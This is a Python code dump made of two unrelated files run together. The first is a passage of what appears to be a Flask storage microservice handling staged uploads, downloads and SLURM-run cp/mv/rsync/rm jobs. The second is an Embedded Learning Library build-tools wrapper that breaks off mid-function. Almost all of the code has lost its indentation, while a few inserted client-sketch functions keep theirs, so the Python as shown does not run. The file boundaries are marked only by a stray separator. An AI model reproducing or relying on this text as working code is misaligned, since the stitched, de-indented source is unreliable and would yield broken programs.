upload_url = staging.create_upload_form(sourcePath, container_name, object_prefix, STORAGE_TEMPURL_EXP_TIME, STORAGE_MAX_FILE_SIZE)
# advise Tasks that the upload begins:
update_task(task_id, headers, async_task.ST_UPL_BEG)
# upload starts:
res = exec_remote_command(headers, system_name, system_addr, upload_url["command"])
# if upload to SWIFT fails:
if res["error"] != 0:
msg = f"Upload to Staging area has failed. Object: {object_name}"
error_str = res["msg"]
if in_str(error_str,"OPENSSH"):
error_str = "User does not have permissions to access machine"
msg = f"{msg}. {error_str}"
app.logger.error(msg)
update_task(task_id, headers, async_task.ST_UPL_ERR, msg)
return
# get Download Temp URL with [seconds] time expiration
# create temp url for file: valid for STORAGE_TEMPURL_EXP_TIME seconds
temp_url = staging.create_temp_url(container_name, object_prefix, object_name, STORAGE_TEMPURL_EXP_TIME,internal=False)
# if error raises in temp url creation:
if temp_url is None:
msg = f"Temp URL creation failed. Object: {object_name}"
update_task(task_id, headers, async_task.ERROR, msg)
return
# if successfully created: store temp_url in the task with success status
update_task(task_id, headers, async_task.ST_UPL_END, temp_url)
# marked deletion from here to STORAGE_TEMPURL_EXP_TIME (default 30 days)
retval = staging.delete_object_after(containername=container_name,prefix=object_prefix,objectname=object_name,ttl=int(time.time()) + STORAGE_TEMPURL_EXP_TIME)
if retval == 0:
app.logger.info(f"Setting {STORAGE_TEMPURL_EXP_TIME} [s] as X-Delete-At")
else:
app.logger.error("Object couldn't be marked as X-Delete-At")
# download large file, returns temp url for downloading
@app.route("/xfer-external/download", methods=["POST"])
@check_auth_header
def download_request():
system_addr = EXT_TRANSFER_MACHINE_INTERNAL
system_name = EXT_TRANSFER_MACHINE_PUBLIC
sourcePath = request.form.get("sourcePath", None) # path file in cluster
v = validate_input(sourcePath)
if v != "":
return jsonify(description="Failed to download file", error=f"'sourcePath' {v}"), 400
[headers, ID] = get_tracing_headers(request)
# checks if sourcePath is a valid path
check = is_valid_file(sourcePath, headers, system_name, system_addr)
if not check["result"]:
return jsonify(description="sourcePath error"), 400, check["headers"]
# obtain new task from Tasks microservice
task_id = create_task(headers, service="storage")
# couldn't create task
if task_id == -1:
return jsonify(error="Couldn't create task"), 400
try:
# asynchronous task creation
aTask = threading.Thread(target=download_task, name=ID,
args=(headers, system_name, system_addr, sourcePath, task_id))
storage_tasks[task_id] = aTask
update_task(task_id, headers, async_task.QUEUED)
storage_tasks[task_id].start()
task_url = f"{KONG_URL}/tasks/{task_id}"
data = jsonify(success="Task created", task_url=task_url, task_id=task_id)
return data, 201
except Exception as e:
data = jsonify(error=e)
return data, 400
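# --- Hypothetical client-side sketch (not part of the service) ---------------
# Illustrates how a client might drive the /xfer-external/download flow above:
# submit the request, then poll the returned task URL until the task carries
# the temporary download URL. The base URL, the auth header name and the
# polled task JSON layout are assumptions for illustration only.
def example_download_client(base_url, auth_token, source_path):
    hdrs = {"Authorization": f"Bearer {auth_token}"}  # assumed auth header name
    resp = requests.post(f"{base_url}/xfer-external/download", headers=hdrs,
                         data={"sourcePath": source_path})
    resp.raise_for_status()
    task_url = resp.json()["task_url"]  # returned by download_request() above
    while True:
        task = requests.get(task_url, headers=hdrs).json()
        data = task.get("task", {}).get("data")  # assumed task payload layout
        if isinstance(data, str) and data.startswith("http"):
            return data  # temp URL set once the upload to the staging area ended
        time.sleep(5)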
# invalidate temp URLs
# parameters:
# - X-Task-Id: task id of the transfer related to the URL that wants to be invalidated
@app.route("/xfer-external/invalidate", methods=["POST"])
@check_auth_header
def invalidate_request():
try:
task_id = request.headers["X-Task-Id"]
if not task_id.isalnum():
return jsonify(error="Header X-Task-Id is not alphanumeric"), 400
except KeyError as e:
return jsonify(error="Header X-Task-Id missing"), 400
[headers, ID] = get_tracing_headers(request)
# search if task belongs to the user
task_status = get_task_status(task_id, headers)
if task_status == -1:
return jsonify(error="Invalid X-Task-Id"), 400
containername = get_username(headers[AUTH_HEADER_NAME])
prefix = task_id
objects = staging.list_objects(containername,prefix)
for objectname in objects:
# error = staging.delete_object(containername,prefix,objectname)
# replacing delete_object by delete_object_after 5 minutes
error = staging.delete_object_after(containername=containername, prefix=prefix, objectname=objectname, ttl=int(time.time())+600)
if error == -1:
return jsonify(error="Could not invalidate URL"), 400
return jsonify(success="URL invalidated successfully"), 201
# async task for upload large files
# user: user in the posix file system
# system: system in which the file will be stored (REMOVE later)
# targetPath: absolute path in which to store the file
# sourcePath: absolute path in local FS
# task_id: async task_id created with Tasks microservice
def upload_task(headers, system_name, system_addr, targetPath, sourcePath, task_id):
fileName = sourcePath.split("/")[-1]
# container to bind:
container_name = get_username(headers[AUTH_HEADER_NAME])
ID = headers.get(TRACER_HEADER, '')
# hash_id is set to task_id since it is no longer needed for (failed) redirection
uploaded_files[task_id] = {"user": container_name,
"system_name": system_name,
"system_addr": system_addr,
"target": targetPath,
"source": fileName,
"status": async_task.ST_URL_ASK,
"hash_id": task_id,
"trace_id": ID}
data = uploaded_files[task_id]
global staging
data["msg"] = f"Waiting for Presigned URL to upload file to staging area ({staging.get_object_storage()})"
# change to a dictionary containing the upload data (for backup purposes) and add the url call
update_task(task_id, headers, async_task.ST_URL_ASK, data, is_json=True)
# check if staging token is valid
if not staging.renew_token():
msg = "Staging Area auth error, try again later"
data["msg"] = msg
data["status"] = async_task.ERROR
update_task(task_id, headers, async_task.ERROR, data, is_json=True)
return
# create or return container
if not staging.is_container_created(container_name):
errno = staging.create_container(container_name)
if errno == -1:
msg = f"Could not create container {container_name} in Staging Area ({staging.get_object_storage()})"
data["msg"] = msg
data["status"] = async_task.ERROR
update_task(task_id, headers, async_task.ERROR, data, is_json=True)
return
object_prefix = task_id
# create temporary upload form
resp = staging.create_upload_form(sourcePath, container_name, object_prefix, STORAGE_TEMPURL_EXP_TIME, STORAGE_MAX_FILE_SIZE, internal=False)
# create download URL for later download from Object Storage to filesystem
app.logger.info("Creating URL for later download")
download_url = staging.create_temp_url(container_name, object_prefix, fileName, STORAGE_TEMPURL_EXP_TIME)
# create certificate for later download from OS to filesystem
app.logger.info(f"Creating certificate for later download")
options = f"-s -G -o '{targetPath}/{fileName}' -- '{download_url}'"
exp_time = STORAGE_TEMPURL_EXP_TIME
certs = create_certificate(headers, system_name, system_addr, f"ID={ID} curl", options, exp_time)
if not certs[0]:
msg = "Could not create certificate for download from Staging Area to filesystem"
app.logger.error(msg)
data["msg"] = msg
data["status"] = async_task.ERROR
update_task(task_id, headers, async_task.ERROR, data, is_json=True)
return
# converts file to string to store in Tasks
cert_pub = file_to_str(fileName=certs[0])
# key_pub = file_to_str(fileName=certs[1])
# key_priv = file_to_str(fileName=certs[2])
temp_dir = certs[3]
# encrypt certificate with CERT_CIPHER_KEY key
cipher = Fernet(CERT_CIPHER_KEY)
# data to be encrypted should be encoded to bytes
# in order to save it as json, the cert encrypted should be decoded to string
cert_pub_enc = cipher.encrypt(cert_pub.encode('utf-8')).decode('utf-8')
resp["download_url"] = download_url
resp["action"] = f"curl {options}"
resp["cert"] = [cert_pub_enc, temp_dir]
data["msg"] = resp
data["status"] = async_task.ST_URL_REC
app.logger.info("Cert and url created correctly")
update_task(task_id, headers, async_task.ST_URL_REC, data, is_json=True)
return
# upload API entry point:
@app.route("/xfer-external/upload",methods=["POST"])
@check_auth_header
def upload_request():
system_addr = EXT_TRANSFER_MACHINE_INTERNAL
system_name = EXT_TRANSFER_MACHINE_PUBLIC
targetPath = request.form.get("targetPath", None) # path to save file in cluster
v = validate_input(targetPath)
if v != "":
return jsonify(description="Failed to upload file", error=f"'targetPath' {v}"), 400
sourcePath = request.form.get("sourcePath", None) # path from the local FS
v = validate_input(sourcePath)
if v != "":
return jsonify(description="Failed to upload file", error=f"'sourcePath' {v}"), 400
[headers, ID] = get_tracing_headers(request)
# checks if targetPath is a valid path
check = is_valid_dir(targetPath, headers, system_name, system_addr)
if not check["result"]:
return jsonify(description="sourcePath error"), 400, check["headers"]
# obtain new task from Tasks microservice
task_id = create_task(headers, service="storage")
if task_id == -1:
return jsonify(error="Error creating task"), 400
# asynchronous task creation
try:
update_task(task_id, headers, async_task.QUEUED)
aTask = threading.Thread(target=upload_task, name=ID,
args=(headers, system_name, system_addr, targetPath, sourcePath, task_id))
storage_tasks[task_id] = aTask
storage_tasks[task_id].start()
task_url = f"{KONG_URL}/tasks/{task_id}"
data = jsonify(success="Task created",task_url=task_url,task_id=task_id)
return data, 201
except Exception as e:
data = jsonify(error=e)
return data, 400
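# --- Hypothetical client-side sketch (not part of the service) ---------------
# Rough outline of the external upload flow implemented above: request the
# presigned upload form, poll the task until the form arrives (ST_URL_REC),
# then push the local file to the staging area; check_upload_files() later
# moves it from Object Storage to the filesystem. The base URL, the auth
# header name and the polled task JSON layout are assumptions.
def example_upload_client(base_url, auth_token, local_file, target_dir):
    hdrs = {"Authorization": f"Bearer {auth_token}"}  # assumed auth header name
    resp = requests.post(f"{base_url}/xfer-external/upload", headers=hdrs,
                         data={"targetPath": target_dir, "sourcePath": local_file})
    resp.raise_for_status()
    task_url = resp.json()["task_url"]  # returned by upload_request() above
    form = None
    while form is None:
        task = requests.get(task_url, headers=hdrs).json()
        msg = task.get("task", {}).get("data", {}).get("msg")  # assumed layout
        if isinstance(msg, dict):  # presigned form received
            form = msg
        else:
            time.sleep(5)
    # The exact keys of 'form' depend on the Object Storage backend in use
    # (Swift, S3v2 or S3v4), so performing the actual POST of the file with
    # that form is left out of this sketch.
    return form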
## Internal Transfer MicroServices:
## cp / rm / mv / rsync using Jobs microservice
# executes system cp/mv/rm or rsync (xfer-internal)
# creates a sbatch file to execute in --partition=xfer
# user_header for user identification
# command = "cp" "mv" "rm" "rsync"
# jobName = --job-name parameter to be used on sbatch command
# jobTime = --time parameter to be used on sbatch command
# stageOutJobId = value to set in --dependency:afterok parameter
# account = value to set in --account parameter
def exec_internal_command(headers, command, jobName, jobTime, stageOutJobId, account):
try:
td = tempfile.mkdtemp(prefix="job")
sbatch_file = open(td + "/sbatch-job.sh", "w")
sbatch_file.write("#! /bin/bash -l\n")
sbatch_file.write(f"#SBATCH --job-name='{jobName}'\n")
sbatch_file.write(f"#SBATCH --time={jobTime}\n")
sbatch_file.write("#SBATCH --error=job-%j.err\n")
sbatch_file.write("#SBATCH --output=job-%j.out\n")
sbatch_file.write("#SBATCH --ntasks=1\n")
sbatch_file.write(f"#SBATCH --partition={XFER_PARTITION}\n")
# test line for error
# sbatch_file.write("#SBATCH --constraint=X2450\n")
if stageOutJobId is not None:
sbatch_file.write(f"#SBATCH --dependency=afterok:{stageOutJobId}\n")
if account is not None:
app.logger.info(account)
sbatch_file.write(f"#SBATCH --account='{account}'")
sbatch_file.write("\n")
ID = headers.get(TRACER_HEADER, '')
sbatch_file.write(f"echo Trace ID: {ID}\n")
sbatch_file.write("echo -e \"$SLURM_JOB_NAME started on $(date)\"\n")
sbatch_file.write(f"srun -n $SLURM_NTASKS {command}\n")
sbatch_file.write("echo -e \"$SLURM_JOB_NAME finished on $(date)\"\n")
sbatch_file.close()
except IOError as ioe:
app.logger.error(str(ioe))
result = {"error": 1, "msg": str(ioe)}
return result
# create xfer job
resp = create_xfer_job(STORAGE_JOBS_MACHINE, headers, td + "/sbatch-job.sh")
try:
# remove sbatch file and dir
os.remove(td + "/sbatch-job.sh")
os.rmdir(td)
except IOError as ioe:
app.logger.error(f"Failed to remove temp sbatch file: {ioe.message}")
return resp
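# For reference, a script generated by exec_internal_command() above for a "cp"
# operation looks roughly like the sketch below. The job name, time, partition
# and trace ID are illustrative placeholders, not output captured from a real
# run, and the optional --dependency/--account directives are omitted.
EXAMPLE_XFER_SBATCH = """#! /bin/bash -l
#SBATCH --job-name='cp-job'
#SBATCH --time=02:00:00
#SBATCH --error=job-%j.err
#SBATCH --output=job-%j.out
#SBATCH --ntasks=1
#SBATCH --partition=xfer
echo Trace ID: <trace-id>
echo -e "$SLURM_JOB_NAME started on $(date)"
srun -n $SLURM_NTASKS cp --force -dR --preserve=all -- '/path/to/source' '/path/to/target'
echo -e "$SLURM_JOB_NAME finished on $(date)"
"""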
# Internal cp transfer via SLURM with xfer partition:
@app.route("/xfer-internal/cp", methods=["POST"])
@check_auth_header
def internal_cp():
return internal_operation(request, "cp")
# Internal mv transfer via SLURM with xfer partition:
@app.route("/xfer-internal/mv", methods=["POST"])
@check_auth_header
def internal_mv():
return internal_operation(request, "mv")
# Internal rsync transfer via SLURM with xfer partition:
@app.route("/xfer-internal/rsync", methods=["POST"])
@check_auth_header
def internal_rsync():
return internal_operation(request, "rsync")
# Internal rm transfer via SLURM with xfer partition:
@app.route("/xfer-internal/rm", methods=["POST"])
@check_auth_header
def internal_rm():
return internal_operation(request, "rm")
# common code for internal cp, mv, rsync, rm
def internal_operation(request, command):
system_idx = SYSTEMS_PUBLIC.index(STORAGE_JOBS_MACHINE)
system_addr = SYS_INTERNALS_UTILITIES[system_idx]
system_name = STORAGE_JOBS_MACHINE
targetPath = request.form.get("targetPath", None) # path to save file in cluster
v = validate_input(targetPath)
if v != "":
return jsonify(description=f"Error on {command} operation", error=f"'targetPath' {v}"), 400
[headers, ID] = get_tracing_headers(request)
# using actual_command to add options to check sanity of the command to be executed
actual_command = ""
if command in ['cp', 'mv', 'rsync']:
sourcePath = request.form.get("sourcePath", None) # path to get file in cluster
v = validate_input(sourcePath)
if v != "":
return jsonify(description=f"Error on {command} operation", error=f"'sourcePath' {v}"), 400
# checks if file to copy, move or rsync (targetPath) is a valid path
# remove the last part of the path (after last "/" char) to check if the dir can be written by user
_targetPath = targetPath.split("/")[:-1]
_targetPath = "/".join(_targetPath)
app.logger.info(f"_targetPath={_targetPath}")
check_dir = is_valid_dir(_targetPath, headers, system_name, system_addr)
if not check_dir["result"]:
return jsonify(description="targetPath error"), 400, check_dir["headers"]
check_file = is_valid_file(sourcePath, headers, system_name, system_addr)
if not check_file["result"]:
check_dir = is_valid_dir(sourcePath, headers, system_name, system_addr)
if not check_dir["result"]:
return jsonify(description="sourcePath error"), 400, check_dir["headers"]
if command == "cp":
actual_command = "cp --force -dR --preserve=all -- "
elif command == "mv":
actual_command = "mv --force -- "
else:
actual_command = "rsync -av -- "
elif command == "rm":
# for 'rm' there's no source, set empty to call exec_internal_command(...)
# checks if file or dir to delete (targetPath) is a valid path or valid directory
check_file = is_valid_file(targetPath, headers, system_name, system_addr)
if not check_file["result"]:
check_dir = is_valid_dir(targetPath, headers, system_name, system_addr)
if not check_dir["result"]:
return jsonify(description="targetPath error"), 400, check_dir["headers"]
sourcePath = ""
actual_command = "rm -rf -- "
else:
return jsonify(error=f"Command {command} not allowed"), 400
# don't add the tracing ID here; the command will be executed by srun
actual_command = f"{actual_command} '{sourcePath}' '{targetPath}'"
jobName = request.form.get("jobName", "") # jobName for SLURM
if jobName == "":
jobName = command + "-job"
app.logger.info(f"jobName not found, setting default to: {jobName}")
else:
v = validate_input(jobName)
if v != "":
return jsonify(description="Invalid jobName", error=f"'jobName' {v}"), 400
try:
jobTime = request.form["time"] # job time, default is 2:00:00 H:M:s
if not job_time.check_jobTime(jobTime):
return jsonify(error="Not supported time format"), 400
except:
jobTime = "02:00:00"
stageOutJobId = request.form.get("stageOutJobId", None) # start after this JobId has finished
if stageOutJobId is not None:
v = validate_input(stageOutJobId)
if v != "":
return jsonify(description="Invalid stageOutJobId", error=f"'stageOutJobId' {v}"), 400
# select index in the list corresponding with machine name
system_idx = SYSTEMS_PUBLIC.index(STORAGE_JOBS_MACHINE)
system_addr = SYS_INTERNALS[system_idx]
app.logger.info(f"USE_SLURM_ACCOUNT: {USE_SLURM_ACCOUNT}")
# get "account" parameter, if not found, it is obtained from "id" command
try:
account = request.form["account"]
v = validate_input(account)
if v != "":
return jsonify(description="Invalid account", error=f"'account' {v}"), 400
except KeyError:
if USE_SLURM_ACCOUNT:
username = get_username(headers[AUTH_HEADER_NAME])
id_command = f"ID={ID} timeout {UTILITIES_TIMEOUT} id -gn -- {username}"
resp = exec_remote_command(headers, STORAGE_JOBS_MACHINE, system_addr, id_command)
if resp["error"] != 0:
retval = check_command_error(resp["msg"], resp["error"], f"{command} job")
return jsonify(description=f"Failed to submit {command} job", error=retval["description"]), retval["status_code"], retval["header"]
account = resp["msg"]
else:
account = None
# check if machine is accessible by user:
# exec test remote command
resp = exec_remote_command(headers, STORAGE_JOBS_MACHINE, system_addr, f"ID={ID} true")
if resp["error"] != 0:
error_str = resp["msg"]
if resp["error"] == -2:
header = {"X-Machine-Not-Available": "Machine is not available"}
return jsonify(description=f"Failed to submit {command} job"), 400, header
if in_str(error_str,"Permission") or in_str(error_str,"OPENSSH"):
header = {"X-Permission-Denied": "User does not have permissions to access machine or path"}
return jsonify(description=f"Failed to submit {command} job"), 404, header
retval = exec_internal_command(headers, actual_command, jobName, jobTime, stageOutJobId, account)
# returns "error" key or "success" key
try:
error = retval["error"]
errmsg = retval["msg"]
desc = retval["desc"]
# headers values cannot contain "\n" strings
return jsonify(error=desc), 400, {"X-Sbatch-Error": errmsg}
except KeyError:
success = retval["success"]
task_id = retval["task_id"]
return jsonify(success=success, task_id=task_id), 201
# function to call SBATCH in --partition=xfer
# uses Jobs microservice API call: POST http://{compute_url}/{machine}
# all calls to cp, mv, rm or rsync are made using the Jobs microservice.
def create_xfer_job(machine, headers, fileName):
files = {'file': open(fileName, 'rb')}
try:
headers["X-Machine-Name"] = machine
req = requests.post(f"{COMPUTE_URL}/jobs/upload",
files=files, headers=headers, verify=(SSL_CRT if USE_SSL else False))
retval = json.loads(req.text)
if not req.ok:
return {"error":1,"msg":retval["description"],"desc":retval["error"]}
return retval
except Exception as e:
app.logger.error(e)
return {"error":1,"msg":e}
@app.route("/status",methods=["GET"])
def status():
app.logger.info("Test status of service")
# TODO: check the backend storage service to truthfully respond to this request
return jsonify(success="ack"), 200
def create_staging():
# Object Storage object
global staging
staging = None
if OBJECT_STORAGE == "swift":
app.logger.info("Object Storage selected: SWIFT")
from swiftOS import Swift
# Object Storage URL & data:
SWIFT_PRIVATE_URL = os.environ.get("F7T_SWIFT_PRIVATE_URL")
SWIFT_PUBLIC_URL = os.environ.get("F7T_SWIFT_PUBLIC_URL")
SWIFT_API_VERSION = os.environ.get("F7T_SWIFT_API_VERSION")
SWIFT_ACCOUNT = os.environ.get("F7T_SWIFT_ACCOUNT")
SWIFT_USER = os.environ.get("F7T_SWIFT_USER")
SWIFT_PASS = os.environ.get("F7T_SWIFT_PASS")
priv_url = f"{SWIFT_PRIVATE_URL}/{SWIFT_API_VERSION}/AUTH_{SWIFT_ACCOUNT}"
publ_url = f"{SWIFT_PUBLIC_URL}/{SWIFT_API_VERSION}/AUTH_{SWIFT_ACCOUNT}"
staging = Swift(priv_url=priv_url,publ_url=publ_url, user=SWIFT_USER, passwd=SWIFT_PASS, secret=SECRET_KEY)
elif OBJECT_STORAGE == "s3v2":
app.logger.info("Object Storage selected: S3v2")
from s3v2OS import S3v2
# For S3:
S3_PRIVATE_URL = os.environ.get("F7T_S3_PRIVATE_URL")
S3_PUBLIC_URL = os.environ.get("F7T_S3_PUBLIC_URL")
S3_ACCESS_KEY = os.environ.get("F7T_S3_ACCESS_KEY")
S3_SECRET_KEY = os.environ.get("F7T_S3_SECRET_KEY")
staging = S3v2(priv_url=S3_PRIVATE_URL, publ_url=S3_PUBLIC_URL, user=S3_ACCESS_KEY, passwd=S3_SECRET_KEY)
elif OBJECT_STORAGE == "s3v4":
app.logger.info("Object Storage selected: S3v4")
from s3v4OS import S3v4
# For S3:
S3_PRIVATE_URL = os.environ.get("F7T_S3_PRIVATE_URL")
S3_PUBLIC_URL = os.environ.get("F7T_S3_PUBLIC_URL")
S3_ACCESS_KEY = os.environ.get("F7T_S3_ACCESS_KEY")
S3_SECRET_KEY = os.environ.get("F7T_S3_SECRET_KEY")
staging = S3v4(priv_url=S3_PRIVATE_URL, publ_url=S3_PUBLIC_URL, user=S3_ACCESS_KEY, passwd=S3_SECRET_KEY)
else:
app.logger.warning("No Object Storage for staging area was set.")
def get_upload_unfinished_tasks():
# cleanup upload dictionary
global uploaded_files
uploaded_files = {}
app.logger.info(f"Staging Area Used: {staging.priv_url} - ObjectStorage Technology: {staging.get_object_storage()}")
try:
# query Tasks microservice for previous tasks. Allow 30 seconds to answer
# only unfinished upload process
status_code = [async_task.ST_URL_ASK, async_task.ST_URL_REC, async_task.ST_UPL_CFM, async_task.ST_DWN_BEG, async_task.ST_DWN_ERR]
retval=requests.get(f"{TASKS_URL}/taskslist", json={"service": "storage", "status_code":status_code}, timeout=30, verify=(SSL_CRT if USE_SSL else False))
if not retval.ok:
app.logger.error("Error getting tasks from Tasks microservice: query failed with status {retval.status_code}, STORAGE microservice will not be fully functional. Next try will be in {STORAGE_POLLING_INTERVAL} seconds")
return
queue_tasks = retval.json()
# queue_tasks structure: "tasks": {
#     task_{id1}: {..., data={} },
#     task_{id2}: {..., data={} } }
# "data" is the field containing each task's upload metadata
queue_tasks = queue_tasks["tasks"]
n_tasks = 0
for key,task in queue_tasks.items():
task = json.loads(task)
# iterating over queue_tasks
try:
data = task["data"]
# check if task is a non ending /xfer-external/upload downloading
# from SWIFT to filesystem and it crashed before download finished,
# so it can be re-initiated with /xfer-external/upload-finished
# In that way it is marked as erroneous
if task["status"] == async_task.ST_DWN_BEG:
task["status"] = async_task.ST_DWN_ERR
task["description"] = "Storage has been restarted, process will be resumed"
headers = {}
headers[TRACER_HEADER] = data['trace_id']
update_task(task["hash_id"], headers, async_task.ST_DWN_ERR, data, is_json=True)
uploaded_files[task["hash_id"]] = data
n_tasks += 1
except KeyError as e:
app.logger.error(e)
app.logger.error(task["data"])
app.logger.error(key)
except Exception as e:
app.logger.error(data)
app.logger.error(e)
app.logger.error(type(e))
app.logger.info(f"Not finished upload tasks recovered from taskpersistance: {n_tasks}")
except Exception as e:
app.logger.warning("Error querying TASKS microservice: STORAGE microservice will not be fully functional")
app.logger.error(e)
@app.before_request
def f_before_request():
new_headers = {}
if JAEGER_AGENT != "":
try:
jaeger_tracer.inject(tracing.get_span(request), opentracing.Format.TEXT_MAP, new_headers)
except Exception as e:
logging.error(e)
g.TID = new_headers.get(TRACER_HEADER, '')
@app.after_request
def after_request(response):
# LogRequestFormatter is used, so these messages will get time, thread, etc.
logger.info('%s %s %s %s %s', request.remote_addr, request.method, request.scheme, request.full_path, response.status)
return response
def init_storage():
# should check the Tasks microservice for tasks that belong to storage
create_staging()
get_upload_unfinished_tasks()
if __name__ == "__main__":
LOG_PATH = os.environ.get("F7T_LOG_PATH", '/var/log').strip('\'"')
# timed rotation: 1 (interval) rotation per day (when="D")
logHandler = TimedRotatingFileHandler(f'{LOG_PATH}/storage.log', when='D', interval=1)
logFormatter = LogRequestFormatter('%(asctime)s,%(msecs)d %(thread)s [%(TID)s] %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
'%Y-%m-%dT%H:%M:%S')
logHandler.setFormatter(logFormatter)
# get app log (Flask+werkzeug+python)
logger = logging.getLogger()
# set handler to logger
logger.addHandler(logHandler)
logging.getLogger().setLevel(logging.INFO)
# checks QueuePersistence and retakes all tasks
init_storage()
# asynchronously checks uploaded_files for completed downloads to the FS
upload_check = threading.Thread(target=check_upload_files, name='storage-check-upload-files')
upload_check.start()
if USE_SSL:
app.run(debug=debug, host='0.0.0.0', use_reloader=False, port=STORAGE_PORT, ssl_context=(SSL_CRT, SSL_KEY))
else:
app.run(debug=debug, host='0.0.0.0', use_reloader=False, port=STORAGE_PORT)
|
buildtools.py
|
####################################################################################################
##
## Project: Embedded Learning Library (ELL)
## File: buildtools.py
## Authors: Chris Lovett, Kern Handa
##
## Requires: Python 3.x
##
####################################################################################################
import json
import os
import sys
sys.path += [os.path.dirname(os.path.abspath(__file__)) ]
import logger
import subprocess
from threading import Thread, Lock
class EllBuildToolsRunException(Exception):
def __init__(self, cmd, output=""):
Exception.__init__(self, cmd)
self.cmd = cmd
self.output = output
class EllBuildTools:
def __init__(self, ell_root, verbose = False):
self.verbose = verbose
self.ell_root = ell_root
self.build_root = None
self.compiler = None
self.swigexe = None
self.llcexe = None
self.optexe = None
self.blas = None
self.logger = logger.get()
self.output = None
self.lock = Lock()
self.find_tools()
def get_ell_build(self):
if not self.build_root:
import find_ell
self.build_root = find_ell.find_ell_build()
return self.build_root
def find_tools(self):
build_root = self.get_ell_build()
if not os.path.isdir(build_root):
raise Exception("Could not find '%s', please make sure to build the ELL project first" % (build_root))
ell_tools_json = "ell_build_tools.json"
jsonPath = os.path.join(build_root, ell_tools_json)
if not os.path.isfile(jsonPath):
raise Exception("Could not find build output: " + jsonPath)
with open(jsonPath) as f:
self.tools = json.loads(f.read())
self.compiler = self.tools['compile']
if self.compiler == "":
raise Exception(ell_tools_json + " is missing compiler info")
self.swigexe = self.tools['swig']
if self.swigexe == "":
raise Exception(ell_tools_json + " is missing swig info")
self.llcexe = self.tools['llc']
if self.llcexe == "":
raise Exception(ell_tools_json + " is missing llc info")
self.optexe = self.tools['opt']
if self.optexe == "":
raise Exception(ell_tools_json + " is missing opt info")
if ("blas" in self.tools):
self.blas = self.tools['blas'] # this one can be empty.
def logstream(self, stream):
try:
while True:
out = stream.readline()
if out:
self.lock.acquire()
try:
self.output += out
msg = out.rstrip('\n')
if self.verbose:
self.logger.info(msg)
finally:
self.lock.release()
else:
break
except:
errorType, value, traceback = sys.exc_info()
msg = "### Exception: %s: %s" % (str(errorType), str(value))
if not "closed file" in msg:
self.logger.info(msg)
def run(self, command, print_output=True, shell=False):
cmdstr = command if isinstance(command, str) else " ".join(command)
if self.verbose:
self.logger.info(cmdstr)
try:
with subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0, universal_newlines = True, shell=shell
) as proc:
self.output = ''
stdout_thread = Thread(target=self.logstream, args=(proc.stdout,))
stderr_thread = Thread(target=self.logstream, args=(proc.stderr,))
stdout_thread.start()
stderr_thread.start()
# wait for both logging threads to finish draining the pipes
# (Thread.isAlive() was removed in Python 3.9; join() also avoids the busy-wait)
stdout_thread.join()
stderr_thread.join()
proc.wait()
if proc.returncode:
self.logger.error("command {} failed with error code {}".format(command[0], proc.returncode))
raise EllBuildToolsRunException(cmdstr, self.output)
return self.output
except FileNotFoundError:
raise EllBuildToolsRunException(cmdstr)
def swig_header_dirs(self):
return [os.path.join(self.ell_root, d) for d in [
'interfaces/common',
'interfaces/common/include',
'libraries/emitters/include'
]]
def swig(self, output_dir, model_name, language):
# swig -python -modern -c++ -Fmicrosoft -py3 -outdir . -c++ -I%ELL_ROOT%/interfaces/common/include -I%ELL_ROOT%/interfaces/common -I%ELL_ROOT%/libraries/emitters/include -o _darknetReferencePYTHON_wrap.cxx darknetReference.i
args = [self.swigexe,
'-' + language,
'-c++',
'-Fmicrosoft']
if language == "python":
args = args + ["-py3"]
if language == "javascript":
args = args + ["-v8"]
args = args + ['-outdir', output_dir] + ['-I' + d for d in self.swig_header_dirs()] + [
'-o', os.path.join(output_dir, model_name + language.upper() + '_wrap.cxx'),
os.path.join(output_dir, model_name + ".i")
]
self.logger.info("generating " + language + " interfaces for " + model_name + " in " + output_dir)
return self.run(args)
def get_llc_options(self, target):
common = ["-filetype=obj"]
# arch processing
if target == "pi3": # Raspberry Pi 3
return common + ["-mtriple=armv7-linux-gnueabihf", "-mcpu=cortex-a53", "-relocation-model=pic"]
if target == "orangepi0": # Orange Pi Zero
return common + ["-mtriple=armv7-linux-gnueabihf", "-mcpu=cortex-a7", "-relocation-model=pic"]
elif target == "pi0": # Raspberry Pi Zero
return common + ["-mtriple=arm-linux-gnueabihf", "-mcpu=arm1176jzf-s", "-relocation-model=pic"]
elif target == "aarch64" or target == "pi3_64": # arm64 Linux
return common + ["-mtriple=aarch64-unknown-linux-gnu", "-relocation-model=pic"]
else: # host
return common + ["-relocation-model=pic"]
def llc(self, output_dir, input_file, target, optimization_level="3", objext=".o"):
# llc -filetype=obj _darknetReference.ll -O3 -mtriple=armv7-linux-gnueabihf -mcpu=cortex-a53 -relocation-model=pic
model_name = os.path.splitext(os.path.basename(input_file))[0]
if model_name.endswith('.opt'):
model_name = model_name[:-4]
out_file = os.path.join(output_dir, model_name + objext)
args = [self.llcexe,
input_file,
"-o", out_file,
"-O" + optimization_level
]
args = args + self.get_llc_options(target)
self.logger.info("running llc ...")
self.run(args)
return out_file
def opt(self, output_dir, input_file, optimization_level="3"):
# opt compiled_model.ll -o compiled_model_opt.ll -O3
model_name = os.path.splitext(os.path.basename(input_file))[0]
out_file = os.path.join(output_dir, model_name + ".opt.bc")
args = [self.optexe,
input_file,
"-o", out_file,
"-O" + optimization_level
]
self.logger.info("running opt ...")
self.run(args)
return out_file
def compile(self, model_file, func_name, model_name, target, output_dir,
use_blas=False, fuse_linear_ops=True, optimize_reorder_data_nodes=True, profile=False, llvm_format="bc",
optimize=True, debug=False, is_model_file=False, swig=True, header=False,
objext=".o", extra_options=[]):
file_arg = "-imf" if is_model_file else "-imap"
format_flag = {
"bc": "--bitcode",
"ir": "--ir",
"asm": "--assembly",
"obj": "--objectCode"
}[llvm_format]
output_ext = {
"bc": ".bc",
"ir": ".ll",
"asm": ".s",
"obj": objext
}[llvm_format]
model_file_base = os.path.splitext(os.path.basename(model_file))[0]
out_file = os.path.join(output_dir, model_file_base + output_ext)
args = [self.compiler,
file_arg, model_file,
"-cfn", func_name,
"-cmn", model_name,
format_flag,
"--target", target,
"-od", output_dir,
"--fuseLinearOps", str(fuse_linear_ops),
"--optimizeReorderDataNodes", str(optimize_reorder_data_nodes)
]
if swig:
args.append("--swig")
if header:
args.append("--header")
args.append("--blas")
hasBlas = bool(use_blas)
if target == "host" and hasBlas and not self.blas:
hasBlas = False
args.append(str(hasBlas).lower())
if not optimize:
args += ["--optimize", "false"]
else:
args += ["--optimize", "true"]
if debug:
